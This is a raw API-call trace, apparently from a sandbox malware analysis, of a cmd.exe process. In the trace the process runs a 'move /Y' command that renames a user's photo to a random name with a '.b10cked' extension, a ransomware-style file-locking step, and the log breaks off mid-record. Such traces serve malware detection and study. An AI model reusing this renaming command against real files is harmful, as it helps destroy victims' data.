0x3 [0143.655] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0143.655] GetEnvironmentStringsW () returned 0x3001f8* [0143.656] FreeEnvironmentStringsW (penv=0x3001f8) returned 1 [0143.656] GetEnvironmentStringsW () returned 0x3001f8* [0143.656] FreeEnvironmentStringsW (penv=0x3001f8) returned 1 [0143.656] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e944 | out: phkResult=0x24e944*=0x40) returned 0x0 [0143.656] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x0, lpData=0x24e950*=0x88, lpcbData=0x24e948*=0x1000) returned 0x2 [0143.656] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x4, lpData=0x24e950*=0x1, lpcbData=0x24e948*=0x4) returned 0x0 [0143.656] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x0, lpData=0x24e950*=0x1, lpcbData=0x24e948*=0x1000) returned 0x2 [0143.656] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x4, lpData=0x24e950*=0x0, lpcbData=0x24e948*=0x4) returned 0x0 [0143.656] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x4, lpData=0x24e950*=0x40, lpcbData=0x24e948*=0x4) returned 0x0 [0143.656] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x4, lpData=0x24e950*=0x40, lpcbData=0x24e948*=0x4) returned 0x0 [0143.656] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x0, lpData=0x24e950*=0x40, lpcbData=0x24e948*=0x1000) returned 0x2 [0143.656] RegCloseKey (hKey=0x40) returned 0x0 [0143.656] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e944 | out: phkResult=0x24e944*=0x40) returned 0x0 [0143.656] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x0, lpData=0x24e950*=0x40, lpcbData=0x24e948*=0x1000) returned 0x2 [0143.656] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x4, lpData=0x24e950*=0x1, lpcbData=0x24e948*=0x4) returned 0x0 [0143.657] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x0, lpData=0x24e950*=0x1, lpcbData=0x24e948*=0x1000) returned 0x2 [0143.657] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x4, lpData=0x24e950*=0x0, lpcbData=0x24e948*=0x4) returned 0x0 [0143.657] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x4, lpData=0x24e950*=0x9, lpcbData=0x24e948*=0x4) returned 0x0 [0143.657] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x4, lpData=0x24e950*=0x9, lpcbData=0x24e948*=0x4) returned 0x0 [0143.657] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e94c, lpData=0x24e950, lpcbData=0x24e948*=0x1000 | out: lpType=0x24e94c*=0x0, lpData=0x24e950*=0x9, lpcbData=0x24e948*=0x1000) returned 0x2 [0143.657] RegCloseKey (hKey=0x40) returned 0x0 [0143.657] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886372 [0143.657] srand (_Seed=0x5b886372) [0143.657] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked\"" [0143.657] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked\"" [0143.657] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.657] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x301958, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0143.658] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.658] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.658] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.658] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0143.658] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0143.658] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0143.658] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0143.658] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0143.658] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0143.658] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0143.658] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0143.658] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0143.658] GetEnvironmentStringsW () returned 0x302348* [0143.658] FreeEnvironmentStringsW (penv=0x302348) returned 1 [0143.658] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.658] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.658] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0143.658] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0143.658] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0143.658] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0143.658] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0143.658] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0143.658] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0143.658] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0143.659] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f710 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.659] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f710, lpFilePart=0x24f70c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f70c*="Desktop") returned 0x18 [0143.659] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.659] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f48c | out: lpFindFileData=0x24f48c) returned 0x3009d8 [0143.659] FindClose (in: hFindFile=0x3009d8 | out: hFindFile=0x3009d8) returned 1 [0143.659] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f48c | out: lpFindFileData=0x24f48c) returned 0x3009d8 [0143.659] FindClose (in: hFindFile=0x3009d8 | out: hFindFile=0x3009d8) returned 1 [0143.659] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f48c | out: lpFindFileData=0x24f48c) returned 0x3009d8 [0143.659] FindClose (in: hFindFile=0x3009d8 | out: hFindFile=0x3009d8) returned 1 [0143.660] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.660] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0143.660] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0143.660] GetEnvironmentStringsW () returned 0x3001f8* [0143.660] FreeEnvironmentStringsW (penv=0x3001f8) returned 1 [0143.660] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.660] GetConsoleOutputCP () returned 0x1b5 [0143.661] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.661] GetUserDefaultLCID () returned 0x409 [0143.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0143.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f850, cchData=128 | out: lpLCData="0") returned 2 [0143.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f850, cchData=128 | out: lpLCData="0") returned 2 [0143.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f850, cchData=128 | out: lpLCData="1") returned 2 [0143.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0143.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0143.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0143.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0143.661] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0143.662] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0143.662] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0143.662] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0143.662] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0143.662] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0143.662] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0143.663] GetConsoleTitleW (in: lpConsoleTitle=0x2f0920, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.663] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.663] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0143.663] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0143.663] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0143.664] _wcsicmp (_String1="move", _String2=")") returned 68 [0143.664] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0143.664] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0143.664] _wcsicmp (_String1="IF", _String2="move") returned -4 [0143.664] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0143.664] _wcsicmp (_String1="REM", _String2="move") returned 5 [0143.664] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0143.668] GetConsoleTitleW (in: lpConsoleTitle=0x24f548, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.890] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0143.890] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0143.890] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0143.890] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0143.890] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0143.890] _wcsicmp (_String1="move", _String2="CD") returned 10 [0143.890] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0143.890] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0143.890] _wcsicmp (_String1="move", _String2="REN") returned -5 [0143.890] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0143.890] _wcsicmp (_String1="move", _String2="SET") returned -6 [0143.890] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0143.890] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0143.890] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0143.890] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0143.890] _wcsicmp (_String1="move", _String2="MD") returned 11 [0143.890] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0143.890] _wcsicmp (_String1="move", _String2="RD") returned -5 [0143.890] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0143.890] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0143.890] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0143.890] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0143.890] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0143.890] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0143.890] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0143.890] _wcsicmp (_String1="move", _String2="VER") returned -9 [0143.890] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0143.890] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0143.890] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0143.890] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0143.890] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0143.890] _wcsicmp (_String1="move", _String2="START") returned -6 [0143.890] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0143.890] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0143.891] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0143.892] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.892] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.892] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f304, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f2fc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f2fc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0143.892] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0143.892] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0143.892] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0143.893] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0143.893] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0143.894] _wcsicmp (_String1="EEJHG5~1.JPG", _String2=".") returned 55 [0143.894] _wcsicmp (_String1="EEJHG5~1.JPG", _String2="..") returned 55 [0143.894] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\eejhg5~1.jpg")) returned 0x20 [0143.894] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x301ef8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.894] SetErrorMode (uMode=0x0) returned 0x0 [0143.894] SetErrorMode (uMode=0x1) returned 0x0 [0143.894] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG", nBufferLength=0x104, lpBuffer=0x24ec8c, lpFilePart=0x24ec74 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG", lpFilePart=0x24ec74*="EEJHG5~1.JPG") returned 0x38 [0143.894] SetErrorMode (uMode=0x0) returned 0x1 [0143.894] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1")) returned 0x10 [0143.894] _wcsicmp (_String1="EEJHG5~1.JPG", _String2=".") returned 55 [0143.894] _wcsicmp (_String1="EEJHG5~1.JPG", _String2="..") returned 55 [0143.894] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\eejhg5~1.jpg")) returned 0x20 [0143.895] SetErrorMode (uMode=0x0) returned 0x0 [0143.895] SetErrorMode (uMode=0x1) returned 0x0 [0143.895] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG", nBufferLength=0x104, lpBuffer=0x24f108, lpFilePart=0x24eea0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG", lpFilePart=0x24eea0*="EEJHG5~1.JPG") returned 0x38 [0143.895] SetErrorMode (uMode=0x0) returned 0x1 [0143.895] SetErrorMode (uMode=0x0) returned 0x0 [0143.895] SetErrorMode (uMode=0x1) returned 0x0 [0143.895] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x24f310, lpFilePart=0x24eea0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked", lpFilePart=0x24eea0*="EEJhG5emgLWHUyVz.jpg.b10cked") returned 0x48 [0143.895] SetErrorMode (uMode=0x0) returned 0x1 [0143.895] SetLastError (dwErrCode=0x0) [0143.895] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\eejhg5emglwhuyvz.jpg.b10cked")) returned 0xffffffff [0143.895] GetLastError () returned 0x2 [0143.895] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x24e81c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e81c) returned 0x2f0f70 [0143.895] FindNextFileW (in: hFindFile=0x2f0f70, lpFindFileData=0x24e81c | out: lpFindFileData=0x24e81c) returned 0 [0143.896] GetLastError () returned 0x12 [0143.896] FindClose (in: hFindFile=0x2f0f70 | out: hFindFile=0x2f0f70) returned 1 [0143.897] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJHG5~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x301c98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x301c98) returned 0x2f0f70 [0143.897] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x24eab4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked", lpFilePart=0x0) returned 0x48 [0143.897] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg", nBufferLength=0x104, lpBuffer=0x24eab4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg", lpFilePart=0x0) returned 0x40 [0143.897] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\eejhg5emglwhuyvz.jpg")) returned 0x20 [0143.897] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\eejhg5emglwhuyvz.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\EEJhG5emgLWHUyVz.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\eejhg5emglwhuyvz.jpg.b10cked"), dwFlags=0x3) returned 1 [0143.897] FindClose (in: hFindFile=0x2f0f70 | out: hFindFile=0x2f0f70) returned 1 [0143.898] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24ea68 | out: _Buffer=" 1") returned 9 [0143.898] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.898] GetFileType (hFile=0x7) returned 0x2 [0143.898] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0143.898] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24e9f4 | out: lpMode=0x24e9f4) returned 1 [0143.898] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.898] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24ea28 | out: lpConsoleScreenBufferInfo=0x24ea28) returned 1 [0143.898] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0143.898] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x24ea68 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0143.899] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24ea4c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x24ea4c*=0x1a) returned 1 [0143.899] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.899] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.899] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.899] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.899] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.899] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.899] SetConsoleInputExeNameW () returned 0x1 [0143.899] GetConsoleOutputCP () returned 0x1b5 [0143.899] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.899] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.900] exit (_Code=0) Process: id = "190" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e60" os_pid = "0x80c" os_integrity_level = "0x3000" os_privileges = 